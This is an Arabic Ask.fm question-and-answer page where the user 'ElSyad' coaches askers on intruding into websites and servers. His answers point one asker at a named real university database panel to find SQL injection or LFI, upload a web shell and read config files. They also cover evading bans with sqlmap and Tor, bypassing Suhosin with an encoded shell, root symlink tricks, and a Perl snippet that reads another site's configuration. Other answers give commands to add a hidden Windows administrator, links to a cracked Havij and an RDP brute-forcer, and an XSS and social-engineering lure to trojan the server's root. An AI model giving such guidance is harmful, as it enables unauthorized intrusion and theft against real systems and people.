@ElSyad

Ahmed ElSyad

Ask me anything Follow
Ask @ElSyad

Sort by:

LatestTop

Previous

مهو سحبت الكونفيغ وكل اشي بس مش قابل يتصل :/

فيه اخطاء بتظهر ليك او حاجة ؟
متاكد من البيانات ؟
ادينا صورة كده

السلام عليكم كيف اجيب الباسورد واليزر نيم تبعون اللوحة هاي https://euclid.ee.duth.gr:50000/phppgadmin/

حاول تفحص الموقع وتشوف فيه ثغرة Sql Inj ولا لا
واذا موجودة شوف صلاحياتك ايه من خلالها
اذا عندك صلاحيات الرفع احقن شل واستعرض ملف الكونفج واتصل من خلاله
او انك تفحص الموقع وتشوف فيه ثغرة Local file include > LFI

People you may like

HessienMohamed901’s Profile Photo Hussain Mohamed
also likes
Mido9695’s Profile Photo Mahmed Y Ahmed
also likes
abdokhaled5’s Profile Photo Abdelrahman | Hacker
also likes
Abdallah_Hashem1296’s Profile Photo Abdallah Hashem
also likes
faisal_fathe’s Profile Photo Faisal Fathe
also likes
Want to make more friends? Try this: Tell us what you like and find people with the same interests. Try this:
#art #selfie #shopping #summer #rock #student #movies #anime #fashion #basketball
+ add more interests + add your interests

اخي بدي دورة اختراق السيرفر عن طريق البرامج المثبتة او البورتاات

مش عارف فيه دورات او لا مبصتش بصراحة
انما ممكن تتابع دروس او شروحات
هدورلك لو لقيت هبلغك على الاسك هنا

اخي لما اعمل ' بعطيني نفس الي في الصورة يعني في عندي هيك ثغرة sql ? http://rghost.net/6grFchHRk/image.png

هو مفيش اى توضيح
بس ممكن يكون خطأ عادى
جرب انك تستخرج عدد الاعمدة وشوف هيطلع معاك ايه
او انك تجرب تشوف اذا الموقع مصاب او لا من اداة Sqlmap

السملا عليكم اخي كيف بقدر اتخطى الباند اثناء الحقن ؟؟؟

ممكن من خلال اداة Sqlmap وتستخدم معاها Tor
او لو يدوى يبقى هتحتاج كذا بروكسى يكونوا شغالين وكل ما تاخد الباند تغيره
بس انصحك بالاول افضل

اخي الصياد فوتت على موقع والموقع مهم وخزن ال ip تبعي شو اعمل شو بتنصحني ؟

الافضل ليك بعد كده
انك تستخدم اداة زى Anonymox الموجودة على Firefox
وهيا اداة عبارة عن مجموعة من البروكسى تستخدم للتخفى
وطرق التخفى مش بتقف على ده وبس لا طبعا كتيرة جدا
بس ممكن تشغل اداة Anonymox مع برنامج SecurityKissTunnel هيقوم بالواجب

مشكلة بالشيل اخوى يظهر لى صفحة بيضاء

فى الاغلب المشكلة هتكون من Suhosin
حاول انك تجيب شل مشفر
وتخلى حروف الدالة eval كبيرة يعنى تبقى على الشكل ده EVAL
والدالة base64_decode نفس الكلام تبقى BASE64_DECODE
وشوف وابقى رد لنا تانى

صياد ابغى نسخة هافج 1.16 المنتشرة

اتفضل يا برنس
بس من رفع الاستاذ الغالى mr.alsa3ek
يعنى نظيفة ان شاء الله
تابع
نزل الاصدار ده وتشغله كـ administrator
http://www.mediafire.com/download/lb24d00zhmd1sf1/havij+v1.16+pro.rar
طريقة تفعيل الاداة
1- انقل المجلد havijpro الى المسار ده
c:\windows\system32
2- انقل الملف tabctl32.ocx الى المسار ده برضو
c:\windows\system32
3- شغل الملف havijpro.exe
ومبروك عليك التفعيل يا برنس

اخوي الصيـآد وش بقول اعمل اختصار لسحب الروت وما ينسحب :( .. صلاحيات الشل يوزر ارفع عليه ملف qx.zip افك الضغط بالامر unzip qx.zip ما يفك :( وين المشكله

ايه وضع Safe mode , Disable functions عندك على السيرفر
جرب تطبق الامر من شل Perl

معطل كلو :/

ادينى ناتج الامر
uname -a
وهل جربت تطبق الاوامر من الشل البيرل ؟
او انك تغير الشل اللى بتشتغل بيه ده طالما ان الوضع الامن معطل والدوال مش ممنوعة

اجنبي :p عالفاضي اذا بقك الضغط عن طريق الامر ما بفك اذا من الشل نفسو نفس مابعتلك بجيبلي

قولنا ايه وضع ال Safe mode , Disable functions عندك الاول يا صديقى
او ارفع شل Perl ونفذ الاوامر منه

سلام عليكم ,, ممكن الطريق من الصفر في تعلم اختراق لمواقع . مع لغات البرمجة اللي احتاجها ؟ و ما هي الدورات الجيدة في هذا المجال ؟ و اذا كنت اريد اتعلم السبام فهل احتاج الى برمجة ام لا ؟

وعليكم السلام
انصحك بتعلم لغة php,mysql لان تطبيقات الويب بتعتمد بشكل كبير جدا عليها اللى هيا السكربتات
فى دورات كتيرة بكل المجالات بس انصحك تتابع دورة استاذنا فارس من منتدى الحماية للابد
او انك تبتدى بدورة الاستاذ الصاعق على الرابط التالى
http://www.gaza-hacker.net/cc/showthread-t_47372.html
بخصوص الاسبام انا مش عندى خبرة فيه والله
ممكن تتابع دورات ليه اما بخصوص تحتاج برمجة او لا مش عارف بصراحة

اه في مجلد اسمو c

تمام يا ريس
خش على المجلد من الشل وارفع ملف الاختصار c.zip
وبعدين فك الضغط عنه من خلال الامر التالى
unzip c.zip
وريح دماغك
بخصوص ملف الاختصار ممكن ببساطة لو مش عندك
تفتح ملف txt فاضى وتحط فيه
/
سلاش فقط واعمل حفظ وبعدين اضغطه من ال Winrar بصيغة zip
بالتوفيق

السلام عليكم أخي الصياد انا أخوك ExPoIiT إدا يمكنك مساعدتي في تعلم السبام وتساعدني بمأنك خبيير ووشكراا أنتظر ردك

وعليكم السلام
اهلا بيك يا ريس
ما زلت مبتدأ واقل من المبتدأ كمان الخبرة نتعلمها منكم يا صديقى
بخصوص استفسارك انا مش عندى خبرة بالسبام
بس انصحك تتابع دورة من اولها لاخرها
وفيه دورات كتيرة بجوجل ولانى مش عندى الخبرة الكافية فيه مقدرش اقولك تبتدى باى دورة فيهم
1
Liked by: Minalista

ولما اطبق هاد الامر ln -s / c/c.TXT بعطيني ln: creating symbolic link `c/c.TXT': Permission denied مشغل شل بيرل انا

مفيش تصريح عندك
ويفضل كتابة الامر التالى
ln -s / c.txt
لان والله اعلم انت كده بتقوله انه يعملك اختصار للجذر داخل مجلد c والاختصار اللى انت عاوزه باسم c.TXT
طيب هو فيه مجلد عندك c اللى انت بتقوله يعمل الاختصار جواه ؟
اذا كان المجلد موجود يبقى رد علينا تانى
اما اذا كان غير موجود المجلد يبقى طبق الامر التالى فى المجلد اللى فيه الهاتكس الخاص بالتخطى
ويفضل يكون الاختصار والهاتكس بمجلد لوحدهم
ln -s / c.txt
موفق

ممكن طرق عمل اختصار لسيرفر تكون جديد الطرق مع سكربتات واداوت . ؟؟

يا صديقى طرق الاختصار للجذر معروفة
الجديد بيكون اما فى تخطى الحماية من خلال ملف htaccess فيه اوامر او اوبشنز جديدة
او او او
كل سيرفر وله حماية خاصة بيه يا ريس
يعنى ممكن تلاقى فى سيرفر تقدر تتخطاه باى htaccess معروف او حتى قديم
وممكن تلاقى سيرفر متقدرش تتخطاه باى حاجة
كل ده بيقف على معرفة الروت بامور الحماية وادارة السيرفر
بخصوص الادوات او السكربتات فيه اداوت بالفعل لكده
بس افتكر ان الاختصار للجذر مش بياخد وقت عكس سحب كونفجات السيرفر
وافتكر اهم حاجة فى الرد ده وهيا
"كل سيرفر وله حماية خاصة بيه"

كيف يتم قراءة الكونفيج من البيرل عندي سيرفر عنيد جدااااااا واريد تخطي الحماية رغم سحبت الكونفيج وكل شئ ورفعت الهاتكسات ولكن لم يظهر هل يوجد امر معين احطه في البيرل واقرا الكونفيج cat /home/xx/public_html/configuration.php

ممكن ببساطة تنفذ اى امر من خلال دالة system
كود بسيط
#!/usr/bin/perl
# by ElSyad
system('cat /home/user/public_html/folder/file.txt');
وان شاء الله هيتم القراءة

بدي احاول اسحب الداتا بيس انا ان شاء الله بدي احاول في عدة طرق

اذا فيه امكانية لتطبيق اوامر Sql على الموقع المصاب او السيرفر اكيد تقدر تسحب بدون اى مشاكل.

السلام عليكم انا الثاني عندي وندوز كيف بقدر استخرج ال rdp منو ؟

وعليكم السلام
والله انا خبرتى قليله فى الويندوز وحاليا بتابع بعض الدروس ليه
طرق السحب كتيرة بس بخصوص الاوامر فيه مجال بتنفيذها ؟
يعنى حاولت تضيف مدير بالسيرفر ؟
net user elsyad 12345 /add
وبعدها تضيفه الى مجموعة الادارة
net localgroup administrators elsyad /add
اذا تم اضافة المدير للسيرفر او انك تجرب تفعيل الخدمة
بس الافضل من كل ده هو رفع باتش اختراق والاتصال من خلاله
وبرضه شوف بجوجل لان خبرتى لسه فى الويندوز :)

انا اكتشفت فيه ثغرة xss + بقدر احقن اكواد اhtml كيف بقدر استغل هاي الثغرة لرفع الشل ؟ اشتغلت هندسة اجتماعية جبت عدد كبير من المعلومات وبصراحة فادتني كتير كتير

جميل جدا
بس انت مجاوبتش على سؤالى هل غرضك رفع صفحة اختراق ام لا ؟
اذا اه يبقى ممكن ببساطة تعمل كود Iframe وتحقن اندكسك
ولو غرضك غير كده وعاوز تسحب السيرفر لغرض ما
هتحتاج هنا اى شل على اى موقع
بعدها تعملك ملف php على Public طبعا بتاعت الموقع ده او فى اى مجلد تمويه وليكن وطبعا هتلغم فيه باتش
/vb/index.php
مثلا يعنى انه منتدى وتطلب من اى حد من الدعم الفنى او من الروت نفسه زيارة المنتدى وكانك بتطلب منه
انك عاوز مثلا تضيف منتداك على السيرفر عنده وتقوله ده رابط المنتدى وهو مخصص مثلا لكده
واوعده انك هتجيب كل اصدقاءك عنده وبمجرد دخوله على الصفحة ينزل الباتش عنده والباقى انت عارفه
او ممكن انك تسحب الكوكيز بتاعه والباقى معروف برضه
فيه طرق كتيرة جدا جدا

اريد طلب برنامج التخمين على rdp و تكون على الويندوز و أظن ان اسم الأداة هو brute tool و اذا وجد شرح لكيفية التخمين بواسطتها و شكرًا مسبقا

دورت ليك لقيت ان فيه كذا اداة
بس لقيت الاداة الاكتر استعمال
RDP Brute
وده شرح مفصل للاداة مع تحميلها للفايدة فقط وللعلم ان المشاركة دى من خارج المنتدى
http://www.dev-point.com/vb/t198875.html#post2253693
بالتوفيق

Next

Language: English

4.1

1,266,418 reviews
© Ask.fm 2024